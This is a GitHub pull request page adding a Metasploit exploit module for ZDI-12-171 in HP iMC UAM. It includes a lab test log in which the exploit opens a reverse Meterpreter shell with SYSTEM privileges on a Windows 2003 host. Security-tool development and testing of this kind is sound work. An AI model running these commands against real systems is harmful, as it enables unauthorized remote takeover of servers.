Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Added module for ZDI-12-171 #997

Merged
merged 2 commits into from Nov 1, 2012
Merged

Added module for ZDI-12-171 #997

merged 2 commits into from Nov 1, 2012

Conversation

jvazquez-r7
Copy link
Contributor

Tested successfully on Windows 2003 SP2 and HP iMC 5.0 E0101 / UAM 5.0 E0102:

msf > use exploit/windows/misc/hp_imc_uam 
msf  exploit(hp_imc_uam) > set rHOST 192.168.172.157
rHOST => 192.168.172.157
msf  exploit(hp_imc_uam) > exploit

[*] Started reverse handler on 192.168.172.1:4444 
[*] Trying target HP iMC 5.0 E0101 / UAM 5.0 E0102 on Windows 2003 SP2...
[*] Sending stage (752128 bytes) to 192.168.172.157
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.157:2924) at 2012-11-01 17:17:06 +0100

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : JUAN-6ED9DB6CA8
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.172.157 - Meterpreter session 1 closed.  Reason: User exit

@wchen-r7
Copy link
Contributor

wchen-r7 commented Nov 1, 2012

Looks good, merging...

@wchen-r7 wchen-r7 merged commit 22fbfb3 into rapid7:master Nov 1, 2012
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

Successfully merging this pull request may close these issues.

None yet

2 participants